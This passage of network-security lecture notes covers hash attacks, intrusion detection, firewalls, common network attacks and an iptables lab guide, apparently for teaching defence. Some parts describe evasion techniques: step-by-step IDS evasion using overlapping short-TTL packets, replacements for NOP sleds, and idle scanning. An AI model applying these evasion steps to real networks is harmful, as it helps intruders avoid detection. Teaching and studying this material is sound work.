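reference = hmac.new(key, message, hashlib.sha256).digest()
print(hmac.compare_digest(tag, reference))  # True
```

In practice the library function is the one to use. The hand-written version is only there to show that the formula and the library agree.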

Hash Function Attacks


What does a break mean for a hash function? If M1 is a message and h is a hash function, then: given h(M1), find M1, or find M2 such that h(M1) = h(M2).

What does it mean to say that a hash function has been broken? It means that one of the attacks (e.g. birthday attack, preimage attack) can be carried out faster than a brute force attack. Once it is broken, we know that there is something not random about it. Broken simply means we have found a weakness in the function.

Preimage Attack

What is a preimage attack? A preimage attack is an attack on a cryptographic hash that attempts to find a message that has a given hash value.

First Preimage Attack
- Objective: Given a hash h(M), find the message M.
- If I have an n bit hash, how much work do I have to do to break it? About 2^(n-1) hash evaluations on average.
- E.g. MD5 is a 128 bit hash, so I need to do about 2^127 work to break it.

Second Preimage Attack
- Objective: Given the message M1, find a different message M2, such that h(M1) = h(M2).
- h(M1) = h(M2) is a collision.

Birthday Attack

Given a function h, the goal of the attack is to find two inputs M1 and M2, such that h(M1) = h(M2). The pair M1, M2 is a collision. The method used to find a collision is simply to evaluate the function h for different input values, which may be chosen randomly or pseudo-randomly, until the same result is found more than once. The principle and mathematics behind the birthday attack are based on the birthday paradox.

How much work do I have to do to find a collision using a birthday attack? About the square root of the number of possible hash values, i.e. about 2^(n/2) evaluations for an n bit hash.

Example: Birthday Paradox

It is the probability that in a set of randomly chosen people some pair of them will have the same birthday. In a group of 23 (or more) randomly chosen people, there is more than 50% probability that some pair of them will both have been born on the same day. For 57 or more people, the probability is more than 99%, reaching 100% as the number of people reaches 366 (ignoring leap years).

In class Richard asked people's birthdays starting from one end of the room. He compared each new birthday with the previous birthdays. After 25 people we got a match!
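The birthday figures quoted above, and the square-root cost of a birthday attack, can both be reproduced with a short program. This is a sketch in Python: `birthday_probability` assumes 365 equally likely birthdays, and `find_collision` looks for a collision on a hash deliberately truncated to 24 bits so that it finishes quickly. The function names and the use of SHA-256 are assumptions for illustration.

```python
import hashlib
from itertools import count


def birthday_probability(people: int, days: int = 365) -> float:
    """Probability that at least two of `people` share a birthday."""
    p_all_different = 1.0
    for i in range(people):
        p_all_different *= (days - i) / days
    return 1.0 - p_all_different


def truncated_hash(message: bytes, bits: int) -> int:
    """The first `bits` bits of SHA-256(message), as an integer."""
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big")
    return digest >> (256 - bits)


def find_collision(bits: int = 24):
    """Hash successive messages until two share the same truncated hash."""
    seen = {}
    for i in count():
        message = str(i).encode()
        value = truncated_hash(message, bits)
        if value in seen:
            return seen[value], message, i + 1
        seen[value] = message


for people in (23, 57, 366):
    print(people, round(birthday_probability(people), 4))

m1, m2, tries = find_collision(24)
print(m1, m2, tries)  # tries is typically a few thousand, near 2^12, not 2^24
```

Finding a message that matches one particular 24 bit value would take millions of attempts on average, while finding any colliding pair takes only thousands. This is the same asymmetry as matching one person's birthday versus finding any matching pair in the room.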

Richard felt confident that he wouldn't get a match for Gwen's birthday (preimage attack), and yet he was also confident that by asking everyone their birthdays and comparing all of them he would get a match. Why? When Richard was trying to find a match to Gwen's birthday, he was only trying to match one birthday. But when he went around comparing everyone's birthdays, there were many more birthdays that were potential matches.

Length Extension Attack

Let's say you have a message M1 that is split into r blocks, such that

    M1 = m1, m2, ... mr
    e.g. Give the bearer of this note $1.50

Hashing with a secret key: I add a key to the front, take the first block, and apply a crazy function. I get the output and then I do it again (i.e. apply the crazy function to the output combined with the next block, then use this new output as the input and apply the crazy function again... and so on). MD5 does this.

Attack: Suppose I wanted to add something to the end of the message (M1) such that I got an extended message (M2)

    M2 = m1, m2, ... mr, mr+1
    e.g. Give the bearer of this note $1.50 and a tonne of gold

Since I know the previous result of hashing M1, I can just keep folding it through. I don't need to know the secret because it is already summarised in the hash value.

Also known as a "message expansion attack".

Prefix Attack

Intrusion Detection System


Intrusion Detection System (IDS): a network security device that monitors network and/or system activities for malicious or unwanted behavior and alerts the administrator.

Intrusion Prevention System (IPS): a network security device that monitors network and/or system activities for malicious or unwanted behavior and takes measures to prevent damage. Stupid measures could be severing the system from the internet; smarter measures could include temporarily preventing read access to protected information, or write access to system critical data.

One disadvantage of an IDS/IPS is that it may have access to a large number of systems in a network and therefore provide a juicy target for an attacker.

An IDS is just like a burglar alarm. It consists of connections to each sub network in your system and monitors them for suspicious behaviour (access out of work hours) and suspicious strings (nop sleds).

Sniffing your own network

One of the ways you do it is to have a signature file: a database of signatures. Use these signatures to match against strings in network traffic to detect possible intrusion. Program to search strings in the network traffic:
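A minimal sketch of such a signature scan is shown below in Python. It is not taken from any real IDS: the signature database, its two entries and the `scan` function are made up for illustration, and real systems such as Snort use far richer rule languages.

```python
# Hypothetical signature database: name -> byte pattern to look for.
SIGNATURES = {
    "x86 NOP sled": b"\x90" * 16,   # a long run of NOP opcodes
    "shell path": b"/bin/sh",       # string commonly found in shellcode
}


def scan(payload: bytes, signatures=SIGNATURES) -> list:
    """Return the names of all signatures that occur in the payload."""
    return [name for name, pattern in signatures.items() if pattern in payload]


normal = b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"
suspicious = b"A" * 32 + b"\x90" * 64 + b"\xeb\x1c\x5e" + b"/bin/sh"

print(scan(normal))       # []
print(scan(suspicious))   # ['x86 NOP sled', 'shell path']
```

A scan like this is purely reactive. It only recognises byte patterns that someone has already added to the database, so an equivalent sequence that does nothing in a different way passes straight through.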

What sort of things would you look for: NOP Sleds, etc But when people write programs to detect these things, then people find a way to go around it. E.g. NOP sled: there are lots of ways of doing nothing. Signatures are very reactive thing, and someone clever can thwort signatures. It's better than nothing IDS is like a buglar alarm: sensors in the machine, and when people do things that are suspicous an alarm goes off. Types of IDS A network intrusion detection system (NIDS) is an independent platform which identifies intrusions by examining network traffic and monitors multiple hosts. Network Intrusion Detection Systems gain access to network traffic by connecting to a hub, network switch configured for port mirroring, or network tap. An example of a NIDS is Snort. A protocol-based intrusion detection system (PIDS) consists of a system or agent that would typically sit at the front end of a server, monitoring and analyzing the communication protocol between a connected device (a user/PC or system). For a web server this would typically monitor the HTTPS protocol stream and understand the HTTP protocol relative to the web server/system it is trying to protect. Where HTTPS is in use then this system would need to reside in the "shim" or interface between where HTTPS is un-encrypted and immediately prior to it entering the Web presentation layer. An application protocol-based intrusion detection system (APIDS) consists of a system or agent that would typically sit within a group of servers, monitoring and analyzing the communication on application specific protocols. For example; in a web server with database this would monitor the SQL protocol specific to the middleware/business-login as it transacts with the database. 
A host-based intrusion detection system (HIDS) consists of an agent on a host which identifies intrusions by analyzing system calls, application logs, file-system modifications (binaries, password files, capability/ACL databases) and other host activities and state. An example of a HIDS is OSSEC.

A hybrid intrusion detection system combines two or more approaches. Host agent data is combined with network information to form a comprehensive view of the network. An example of a hybrid IDS is Prelude.

In a passive system, the IDS sensor detects a potential security breach, logs the information and signals an alert on the console and/or to the owner. In a reactive system, also known as an intrusion prevention system (IPS), the IDS responds to the suspicious activity by resetting the connection or by reprogramming the firewall to block network traffic from the suspected malicious source. This can happen automatically or at the command of an operator.

Problems with IDS

- The IDS itself is a juicy target, as it is connected to every subnetwork with root access.
- How do we respond once an attacker is detected?
- False alarms: the stricter the rules, the more false positives, increasing disruption and response cost.
- Too many false positives (the IDS going off when no attacker is present) could render the response system useless or too expensive.
- Monitoring the system is expensive.
- An attacker could physically disable the IDS sensors.
- If it is a good system, then the level of annoyance will be huge.
- Asymmetry: there are a limited number of IDS implementations, and any well-funded attacker can craft an attack that will slip past the IDS.

How do you detect stuff?

Detecting an exploit by looking for a NOP sled? The black hat can replace the NOP sled with a similar sequence which does nothing but appears much more innocent, e.g.:
- relative jumps
- double XOR (careful though, this won't work if you jump to the wrong address and do an odd number of jumps!)
- floating point operations (relatively slow)

Deadly Packet

Send overlapping packets, i.e. two packets with the same sequence number. A naive IDS will check the first one, then assume that the overlapping one will be dropped downstream, without actually checking it. But if you set the time-to-live (TTL) on the leading packets to be small enough, they will die before reaching the firewall, and the firewall will only receive the malicious packets that the IDS has ignored!

1. Send a non-malicious packet first, with a short TTL.
2. Send a malicious packet second, with the same sequence number and a longer TTL.
3. The IDS gets the first packet and clears it.
4. The IDS gets the second packet later, sees a sequence number it has already cleared and does not inspect it.
5. The first packet never gets any further: its TTL runs out and it is dropped.
6. The target gets the second packet, treats that sequence number as cleared by the IDS and assembles it.

Example: packets are presented as (sequence number, time-to-live):

Firewall <= IDS <= (1, 1) <= (1, 10) <= (2, 1) <= (2, 10) <= (3, 1) <= (3, 10) <= internet

but the firewall will only get this:

Firewall <= (1, 9) <= (2, 9) <= (3, 9) <= IDS <= internet

which looks like a valid stream.

The sequence numbers are presented here as contiguous integers for simplicity. In reality they work a little differently, but the principle still applies; it is just a little harder.
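The TTL trick can be replayed with a small simulation. This is a sketch under simplifying assumptions: the function name and the packet layout (sequence number, TTL, payload) are made up for illustration, the IDS only inspects the first packet it sees for each sequence number, and there is exactly one hop between the IDS and the firewall.

```python
def ids_then_hop(packets):
    """Simulate a naive IDS followed by one network hop.

    packets: list of (seq, ttl, payload) in arrival order at the IDS.
    Returns (inspected, forwarded):
      inspected - payloads the IDS actually looked at
      forwarded - (seq, ttl, payload) tuples that reach the firewall
    """
    seen = set()
    inspected = []
    forwarded = []
    for seq, ttl, payload in packets:
        if seq not in seen:        # only the first packet per sequence number
            seen.add(seq)
            inspected.append(payload)
        ttl -= 1                   # one hop from the IDS to the firewall
        if ttl > 0:                # packets whose TTL hits zero are discarded
            forwarded.append((seq, ttl, payload))
    return inspected, forwarded

if __name__ == "__main__":
    stream = [(1, 1, "ok"), (1, 10, "EVIL"),
              (2, 1, "ok"), (2, 10, "EVIL"),
              (3, 1, "ok"), (3, 10, "EVIL")]
    inspected, forwarded = ids_then_hop(stream)
    print("IDS inspected:", inspected)
    print("Firewall received:", forwarded)
```

The IDS only ever inspects the harmless payloads, while the firewall only ever receives the other ones, matching the (1, 9), (2, 9), (3, 9) stream in the example.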

Firewalls
A firewall is a dedicated piece of hardware or a software program that regulates the flow of traffic between a computer and the computer network. It is a machine that sits on the edge of your network, or sometimes outside your network, and decides which packets to let in. It refuses packets it doesn't trust and accepts packets it trusts. The job of a firewall is to decide which packets should get through, but sometimes a firewall can be tricked, leaving your network vulnerable to exploitation.

If I want to attack your computer, I have to send input to a program already running on your computer. You might think that I can't attack your computer if you don't have anything running, but when packets arrive, your operating system inspects them and decides what to do with them. It then usually decides to run a program to deal with the packets, so the mere act of sending packets to your computer can trigger my exploit on your computer.

Computers on a network are like eager bunnies waiting to service requests. Unfortunately they will also service the requests of bad guys.

Hardware Firewall: a separate device or set of devices configured to permit, deny, encrypt, or proxy all computer traffic between different security domains based upon a set of rules and other criteria.

Software Firewall: a piece of software installed on the computer that inspects network traffic passing through it, and denies or permits passage based on a set of rules.

Two main methods of operation:
- Exclusive: allow all traffic through unless it matches a filter
- Inclusive: deny all traffic unless it matches a filter (safer: less chance of unwanted traffic passing through)

The concept behind a firewall: if a bad guy gets a packet in and the program that responds has a vulnerability, the bad guy has your machine. You can harden your machine by turning some programs off so they won't respond, always installing the latest patches and not using programs with known vulnerabilities. What is the problem with a policy of hardening your machine? Most users won't do it. So admins only let network traffic into the network through a little gate, known as a firewall.

Advantages of Firewalls
- Increases the sense of security.
- Protects computer(s) from malicious code entering the system.

Disadvantages of Firewalls
- Can be difficult to configure correctly.
- A software firewall uses system resources, which slows down overall performance.
- If the OS is compromised, then the software firewall can be compromised.

Problems with firewalls
1. They make people inside feel safe (overconfident), but safety is not guaranteed: some packets will eventually get through.
2. They often protect against incoming traffic, but sometimes programs on your computer will set up connections outside your network and give an attacker direct access to your machine.
3. Attackers may gain access via a wireless card operating inside the network.
4. Attackers may bypass your firewall by tunnelling.
5. They may also attack the firewall itself.

We don't want to slow our network by making our firewall a bottleneck. This is bad as it will frustrate users and also alert attackers to the presence of the firewall, which they may then attack.

The firewall can choose to swallow bad packets, but what if the packet is from a user who is trying to get into the network the wrong way? Legitimate users may be rejected. However, dropping packets makes the firewall look like it is not present, which means attackers glean less information about how they might attack it.

Simple Firewalls just look at the IP header of a packet to see if it should be accepted, rejected or dropped. This is called an IP filter. They look at what type of packets they are, where packets claim to be coming from and going to, and what port numbers the packets address.

Better Firewalls keep state information about the packets, i.e. they only allow incoming packets that are part of a continuing connection that was set up from the inside.

Even Better Firewalls look at exactly what the packet contains, like a doorman searching your pockets.

Types Of Firewall
Network Layer Firewalls
These are essentially packet filters, which operate at a relatively low level of the TCP/IP protocol stack, not allowing packets to pass through the firewall unless they match the established rule set. There are two categories:

1. Stateless Filtering
- examines the headers of packets requesting a connection to a computer behind the firewall
- compares the information in the header with the iptables rules (i.e. access control lists) to decide if the packet should be dropped or passed
- easy to circumvent, e.g. by IP spoofing
- is "stateless", so it doesn't check whether a packet is part of an existing stream or not
- allows direct connections from the external network to the internal network

2. Stateful Filtering
- examines the content of the packet as well (relies on TCP's 3-way handshake: SYN, SYN/ACK, ACK)
- able to determine the state of the communication (start of a new connection, part of an existing connection, or an invalid packet)
- will close off ports until a connection to a specific port is requested
- prevents attacks that take advantage of existing connections
- vulnerable to DoS attacks if a lot of new connections are opened very fast
- can also handle connectionless protocols such as UDP
- if Linux is used as the firewall, overhead can be low as filtering is done at kernel level

Application Layer Firewall


These work on the application level of the TCP/IP stack, and may intercept all packets travelling to or from an application. They limit the access which software applications have to the operating system services, and consequently to the internal hardware resources found in a computer.
- can prevent all unwanted outside traffic from reaching protected machines
- patch over logic flaws in the OS: they close the loopholes around the OS more tightly and make the chance of unwanted code execution extremely slim
- can restrict or prevent outright the spread of networked computer worms and trojans by inspecting all packets for improper content
- may have their own logic flaws, just like any other software

Proxies

A proxy device may act as a firewall by responding to input packets whilst blocking other packets.
- makes tampering with an internal system more difficult
- means that misuse of one internal system would not necessarily cause a security breach
- crackers may still employ methods such as IP spoofing to attempt to pass packets to a target network

Network Address Translation


This technique remaps an entire internal address space, typically onto one public address, which hides the true addresses of the protected hosts.

Getting Around Firewalls


Port scanning involves someone bombarding a firewall with packets and checking what they get back, to learn how the firewall treats different packets. If a packet is dropped, they will receive no response. If a packet is rejected, they will receive an error message. If the packet is accepted, they will receive a normal reply. nmap can be used to do this. To escape detection, an attacker can even schedule the packets so they go off at random intervals over a long period of time.

Attackers can use firewalls against you, by sneaking a packet through or by attacking the firewall machine itself.

Common firewall attacks


Port Scanning Attack
As its name suggests, the attacker uses it to find out which ports are available to break into.

Idle scanning lets you scan a target in such a way that it can't detect that it was you. To begin, you send a dummy SYN packet to an idle "zombie" machine; from the IP identification (IP ID) number in the reply you can (if the zombie does not randomise these numbers) predict the ID of the zombie's next outgoing packet. You then send the scanning packet to the target machine, spoofing the zombie's address as the source. You then send another SYN packet to the zombie: if the number in its reply doesn't match the expected number, the zombie sent a packet in between, so the target did respond to it. Otherwise, it didn't.

Protection: port scanning is a preface to an attack, so usually you cannot, and do not have to, do much about it.
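The counter arithmetic behind idle scanning can be sketched as a toy model. The class and function names are hypothetical, no real packets are sent, and the zombie is assumed to be completely idle and to increase its counter by one for every packet it sends.

```python
class Zombie:
    """Idle host whose packet counter goes up by one per packet sent."""

    def __init__(self, start_id=1000):
        self.counter = start_id

    def send_packet(self):
        self.counter += 1
        return self.counter

def idle_scan(zombie, port_is_open):
    """Return True if the attacker would conclude the target port is open."""
    first = zombie.send_packet()     # zombie's reply to the first probe
    if port_is_open:
        # The target answers the spoofed SYN by sending SYN/ACK to the
        # zombie, which replies with a reset: one extra outgoing packet.
        zombie.send_packet()
    # If the port is closed the target sends a reset to the zombie,
    # which the zombie silently ignores (no outgoing packet).
    second = zombie.send_packet()    # zombie's reply to the second probe
    return second - first == 2

if __name__ == "__main__":
    print(idle_scan(Zombie(), port_is_open=True))
    print(idle_scan(Zombie(), port_is_open=False))
```

A gap of two between the probes means the zombie sent something in between; a gap of one means it did not. The target only ever sees the zombie's address.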

Denial-of-Service (DoS) Attack


The basic idea of this attack is to make the computer use up all of its resources so that it refuses service to legitimate users. There are several different types of DoS attack.

ICMP ping flood

The attacker overwhelms the victim with ICMP Echo Request packets (ping). As a result, the network's bandwidth is quickly used up, preventing legitimate packets from getting through to their destinations.

Protection: use a firewall to filter ICMP Echo Request packets, or to limit the rate at which your firewall will pass ICMP Echo Request packets.

TCP SYN flood

A normal connection between a user (Alice) and a server. The three-way handshake is correctly performed.

SYN Flood: The attacker sends heaps of SYN packets but never sends the final "ACK" back to the server. The connections are therefore left half-open, consuming server resources. The attacker keeps doing this until all the server's resources are used up. As a result, when a legitimate user tries to connect, the server refuses to open a connection because it has run out of resources: a denial of service.

Protection: limit the number of new connections from a source per time frame.
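A toy model of the server's half-open connection table shows why the flood works. The class, its method names and the backlog size are assumptions made for illustration; real TCP stacks also time out half-open entries and may use defences such as SYN cookies.

```python
class Server:
    """Server with a fixed number of slots for half-open connections."""

    def __init__(self, backlog=4):
        self.backlog = backlog
        self.half_open = set()

    def on_syn(self, client):
        """Handle a SYN. Returns True if a SYN/ACK is sent back."""
        if len(self.half_open) >= self.backlog:
            return False                 # table full: connection refused
        self.half_open.add(client)
        return True

    def on_ack(self, client):
        """Handle the final ACK. Returns True if the handshake completes."""
        if client in self.half_open:
            self.half_open.remove(client)   # slot is freed
            return True
        return False

if __name__ == "__main__":
    server = Server(backlog=3)
    print(server.on_syn("alice"), server.on_ack("alice"))  # normal handshake
    for i in range(3):
        server.on_syn(f"spoofed-{i}")    # attacker never sends the ACK
    print(server.on_syn("alice"))        # legitimate user is now refused
```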

SSH Brute-Force Attack


Practically all UNIX-based servers run an SSH server to allow remote administration across the Internet. From time to time, you might notice a large number of failed login attempts. Often, these are brute-force attacks against your SSH server.

Protection:
- Change the default port: this only stops attackers who are just scanning for SSH servers on the default port. An advanced port scanner will easily reveal the daemon on a non-standard port.
- Disable root access: allowing remote root login makes a successful brute-force attack far more dangerous. Even if root access is disabled, the attacker might still be able to log in as a non-privileged user and then use an exploit to become super-user.
- Limit connections: this should not be noticed by legitimate users, but will delay attackers when repeated brute-force attempts are made.
- Disable password authentication: the idea is to use a pre-assigned private key instead of password authentication, because a password is far easier to guess and break.
- Deploy anti-brute-force tools: SSHDFilter, DenyHosts, Brute-Force Detection etc.

Spoofing Attack
One person or program successfully masquerades as another by falsifying data, thereby gaining an illegitimate advantage.

IP Address Spoofing

The packet's source IP address is changed so that it appears to have been sent from a different machine.
- Can be used in a SYN flood, where the attacker does not care about the replies but wants to flood the victim. Spoofing also makes the packets hard to filter.
- Can be used by network intruders to defeat network security measures, such as authentication based on IP addresses.

Protection: packet filtering. The gateway usually does ingress filtering, which drops external packets that claim to have the IP address of an internal machine (this protects against spoofing of internal addresses).

DNS Cache Spoofing

The attacker exploits a flaw in the DNS software and makes the server accept false information, for example replacing records with content of the attacker's choice.

Protection: DNS servers should be
- less trusting of the information passed to them by other DNS servers
- ignoring any DNS records passed back which are not directly relevant to the query

Christmas Tree Packets Attack


A Christmas tree packet is a packet with every single option set for whatever protocol is in use. It is so named because all of the packet's options are "turned on", just like a Christmas tree covered in colourful little light bulbs.

1. Can be used for information gathering: the attacker sends a Christmas tree packet to the victim and analyses the response to acquire information.
2. A large number of Christmas tree packets can also be used to conduct a DoS attack, exploiting the fact that Christmas tree packets require much more processing by routers and end-hosts than 'usual' packets do.

Protection: Christmas tree packets are highly suspicious, as they are not commonly in use, so they can be easily detected and filtered by an intrusion detection system or an advanced firewall.

Iptables
iptables is the most popular Linux firewall tool and is available with most major Linux distributions.

General iptables concepts


iptables is used to set up, maintain and inspect the tables of packet-filtering rules in the Linux kernel. Each table contains chains; each chain has a list of rules which can match packets; and each rule has a target which determines what will happen to the packet if it matches (see Glossary).

There are 3 predefined chains in iptables (INPUT, FORWARD, OUTPUT). Each of these chains has a policy, which is what happens to a packet that goes through the whole list of rules in the chain without matching any of them. The rules in a chain are checked in order, and as soon as one matches, its target (action) is carried out. Targets such as ACCEPT and DROP determine the ultimate fate of the packet: allow or block.

In the diagram below, iptables has been set up on white#1 (192.168.100.1) to accept all traffic going out from white#1 and block all traffic coming into white#1 unless it matches one of the four rules. In this example white#8 is trying to access white#1 via Telnet (port 23). This does not match any of the rules, so the policy for the INPUT chain is applied: the packet is dropped, and white#8 will not gain access to white#1.

Note: For this lab, the FORWARD chain is not used as the traffic is directly from white#8 (outside computer) to white#N (your computer). The FORWARD chain is used if traffic is going through the machine - so from an outside machine, through the firewall and passed onto another machine on the internal network.

Commonly used targets (actions)

target    Description
ACCEPT    The packet is accepted and handed over
DROP      The packet is denied and dropped
LOG       The packet will be logged and processed with the next rule
REJECT    Similar to DROP, but an error message will be sent to the host who sent the packet

General Iptables Switches


command switch and description:

-j <target>
    jump to the specified target when a matching packet is found
-A
    append rules to the chain
-P
    changes the policy for the specified chain (one of INPUT, FORWARD, OUTPUT)
-N <name>
    creates a new user-defined chain with the specified name
-F [chain]
    flushes/empties out all the rules of the specified chain. If you don't specify a chain, ALL chains will be emptied
-X [name]
    removes a user-defined chain specified by name. If you don't specify a chain, ALL user-defined chains will be removed. Note: the chains must be empty (use flush) before they can be removed
-i <interface>
    match the "input" interface where the packet enters (e.g. eth0, PPPoE). Used for the INPUT/FORWARD chains
-o <interface>
    match the "output" interface where the packet exits (e.g. eth0, PPPoE). Used for the OUTPUT/FORWARD chains
-s <ip-address>
    match the source IP address
-d <ip-address>
    match the destination IP address
-p <protocol>
    specify the matching protocol (e.g. tcp, udp, icmp)
-p tcp --dport <port>
    match the destination port for tcp/udp traffic (note: the --dport switch must be used with '-p tcp' or '-p udp')
-p tcp --dport <start:end>
    match a destination port RANGE from start to end for tcp/udp traffic (note: the --dport switch must be used with '-p tcp' or '-p udp')
-p tcp --sport <port>
    match the source port for tcp/udp traffic (note: the --sport switch must be used with '-p tcp' or '-p udp')
-p tcp --sport <start:end>
    match a source port RANGE from start to end for tcp/udp traffic (note: the --sport switch must be used with '-p tcp' or '-p udp')
-p tcp --syn
    match packets that have the SYN bit set and the ACK, RST and FIN bits cleared. Packets that are initiating a TCP connection will match this condition

Usage Examples
TCP traffic coming from anywhere to port 23 will be dropped:
/sbin/iptables -A INPUT -i eth0 -p tcp --dport 23 -j DROP

TCP traffic coming from 192.168.100.8 to port 23 will be dropped:
/sbin/iptables -A INPUT -i eth0 -p tcp -s 192.168.100.8 --dport 23 -j DROP

TCP traffic going out from the machine to port 25 will be let through:
/sbin/iptables -A OUTPUT -o eth0 -p tcp --dport 25 -j ACCEPT

ICMP traffic coming from 192.168.100.8 will be blocked, i.e. white#8 can't ping the machine:
/sbin/iptables -A INPUT -s 192.168.100.8 -p icmp -j DROP

TCP traffic coming from 10.0.0.0 to 10.0.255.255 will be blocked (xxx.xxx.xxx.xxx/yy, where yy is a mask):
/sbin/iptables -A INPUT -s 10.0.0.0/16 -p tcp -j DROP

Sets the policy for the INPUT chain so any packet that has not matched the rules will be dropped:
/sbin/iptables -P INPUT DROP

Flushes all the rules in the OUTPUT chain:
/sbin/iptables -F OUTPUT
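How a chain reaches its decision (rules checked in order, first match wins, policy as the fallback) can be modelled in Python. This is a simplified sketch and not how iptables is implemented: the dictionary layout for rules and packets is invented for illustration, and only terminating targets are modelled (a LOG rule, which lets the packet carry on to the next rule, is not).

```python
from ipaddress import ip_address, ip_network

# Hypothetical rule list, loosely mirroring the usage examples.
RULES = [
    {"proto": "tcp", "src": "192.168.100.8/32", "dport": 23, "target": "DROP"},
    {"proto": "icmp", "src": "192.168.100.8/32", "target": "DROP"},
    {"proto": "tcp", "dport": 22, "target": "ACCEPT"},
]

def rule_matches(rule, pkt):
    """A rule matches only if every condition it specifies matches."""
    if "proto" in rule and rule["proto"] != pkt["proto"]:
        return False
    if "src" in rule and ip_address(pkt["src"]) not in ip_network(rule["src"]):
        return False
    if "dport" in rule and rule["dport"] != pkt.get("dport"):
        return False
    return True

def decide(rules, policy, pkt):
    """Walk the chain in order; fall back to the policy if nothing matches."""
    for rule in rules:
        if rule_matches(rule, pkt):
            return rule["target"]
    return policy

if __name__ == "__main__":
    telnet = {"proto": "tcp", "src": "192.168.100.8", "dport": 23}
    ssh = {"proto": "tcp", "src": "10.0.0.5", "dport": 22}
    web = {"proto": "tcp", "src": "10.0.0.5", "dport": 80}
    for pkt in (telnet, ssh, web):
        print(pkt, "->", decide(RULES, "DROP", pkt))
```

The web packet matches no rule, so its fate is decided purely by the chain policy, which is why an inclusive firewall sets the policy to DROP.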

Advanced Iptables Concepts


Match Extensions

iptables can have fairly complex rules, which provide great flexibility in managing how packets are filtered. One advanced feature that allows you to create complex rules is the use of extended packet matching modules. There are two ways to load these extension modules:

1. Implicitly: -p or --protocol. You have already seen this, e.g. if you have -p tcp, iptables will load all tcp extensions (e.g. --dport, --sport, --syn etc.)
2. Explicitly: -m or --match. Using -m <module> will explicitly tell iptables to load the specified module.

There are many extension modules; some common ones are limit and recent.
Limit Module

The limit module restricts the rate of matches. It will only match a given number of times per unit of time (the default is 3 matches per hour with a burst of 5). Burst indicates the number of matches that will be allowed before the limit kicks into action. There are two optional parameters for the limit module:

1. --limit <rate>: specifies the maximum average number of matches to allow per unit of time. You specify the unit explicitly, using '/second', '/minute', '/hour' or '/day', or parts of them (so '5/second' is the same as '5/s').
2. --limit-burst <number>: indicates the maximum burst before the limit kicks into action.

The way limit and limit-burst work together is easiest explained by an example:
/sbin/iptables -A INPUT -m limit --limit 1/min --limit-burst 3 -j LOG

The first time this rule is reached, the packet will be logged. In fact, since the burst is set to 3, the first 3 packets will be logged. After this, it will be 1 minute before the next packet will be logged by this rule, regardless of how many packets reach it. Also, for every minute which passes without matching a packet, one of the burst will be regained. So if no packets hit the rule for 3 minutes, the burst will be fully recharged back to 3.

Usage Example

Accepts incoming TCP packets at a rate of 3 per minute with a limit burst of 5. Packets over the limit do not match this rule and carry on down the chain:
/sbin/iptables -A INPUT -p tcp -m limit --limit 3/min --limit-burst 5 -j ACCEPT
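The interplay of --limit and --limit-burst behaves like a credit counter, which can be sketched as follows. This is a simplified model for building intuition, not the kernel's code; the class name is made up, and times are whole seconds so that the arithmetic stays exact.

```python
class LimitMatch:
    """Credit-based model of '-m limit --limit 1/<period> --limit-burst <burst>'."""

    def __init__(self, seconds_per_match, burst):
        self.cost = seconds_per_match          # credit used up by one match
        self.cap = seconds_per_match * burst   # a full burst worth of credit
        self.credit = self.cap                 # start fully charged
        self.last = 0

    def matches(self, now):
        """Return True if a packet arriving at time `now` (seconds) matches."""
        # Credit is regained as time passes, but never beyond the burst.
        self.credit = min(self.cap, self.credit + (now - self.last))
        self.last = now
        if self.credit >= self.cost:
            self.credit -= self.cost
            return True
        return False

if __name__ == "__main__":
    rule = LimitMatch(seconds_per_match=60, burst=3)   # --limit 1/min --limit-burst 3
    for t in (0, 1, 2, 3, 30, 60, 61):
        print(t, rule.matches(t))
```

With these settings the packets at 0, 1 and 2 seconds use up the burst, the packets at 3 and 30 seconds do not match, and the packet at 60 seconds matches again because one minute's worth of credit has been regained.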

Recent Module

Allows you to dynamically create a list of IP addresses and then match against that list in a few different ways. For example, you can create a 'badguy' list of people who have been attempting to connect to port 23 on your firewall and then DROP all future packets from the 'badguy' list. It is a bit like creating a dynamic blacklist.

Some useful recent module switches:

--name [string]
    Specifies the name of the list. If no name is given, 'DEFAULT' will be used
--set
    Adds the source address of the packet to the list. If the address already exists, it will update the entry
--rcheck
    Checks if the source address is in the list
--update
    Like --rcheck, except that if it matches, it will update the 'last seen' timestamp
--hitcount <number>
    Will only match if the address is in the list AND the number of packets received is greater than or equal to the given value. Must be used with one of --rcheck or --update
--seconds <number>
    Will only match if the address is in the list AND it was last seen within the given number of seconds. Must be used with one of --rcheck or --update

Here are two examples of the recent module in action.

Example 1

/sbin/iptables -A INPUT -i eth0 -p tcp -m recent --rcheck --seconds 60 -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp -d 100.42.1.0/24 -m recent --set -j DROP

In Example 1, anyone trying to send data using the TCP protocol to 100.42.1.0~100.42.1.255 is considered a bad guy (Rule#2). The first packet trying to send data to 100.42.1.0/24 will not match Rule#1, but will be caught by Rule#2. Once it has been caught by Rule#2, the source address will be put into the recent list and that packet will be dropped. Any subsequent TCP packet from that source address that arrives within 60 seconds of that entry will be dropped by Rule#1, regardless of the nature of the packet (destination address, destination port etc).

Example 2

/sbin/iptables -A INPUT -i eth0 -p tcp -m recent --update --seconds 60 -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp -d 100.42.1.0/24 -m recent --set -j DROP

Example 2 is identical to Example 1 except it uses --update instead of --rcheck in Rule#1. This means that every subsequent packet from a source address in the list will cause the 'last seen' timestamp for that address to be updated. Therefore there must be a "quiet time" (ie. no activity) of 60 seconds from that source address before any packets coming from it will even be considered. For more information (and more switches) you can use man iptables
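The difference between --rcheck and --update can be made concrete with a small simulation of the two rules for a single source address. It is a sketch under assumptions: the function name and input format are invented, and the real module keeps more state (hit counts, several named lists) than the single timestamp used here.

```python
def simulate(arrivals, mode, window=60):
    """Replay TCP packets from one source address through the two rules.

    arrivals: list of (time_in_seconds, goes_to_protected_range) tuples
    mode:     "rcheck" (Example 1) or "update" (Example 2)
    Returns one boolean per packet: True if the packet was dropped.
    """
    last_seen = None                  # entry for this source in the list
    dropped = []
    for now, to_protected in arrivals:
        # Rule#1: address is in the list and was seen within `window` seconds.
        if last_seen is not None and now - last_seen <= window:
            if mode == "update":
                last_seen = now       # --update refreshes 'last seen' on a match
            dropped.append(True)
            continue
        # Rule#2: packets to the protected range add/refresh the entry.
        if to_protected:
            last_seen = now
            dropped.append(True)
            continue
        dropped.append(False)         # falls through to the rest of the chain
    return dropped

if __name__ == "__main__":
    packets = [(0, True), (30, False), (70, False), (100, False)]
    print("rcheck:", simulate(packets, "rcheck"))
    print("update:", simulate(packets, "update"))
```

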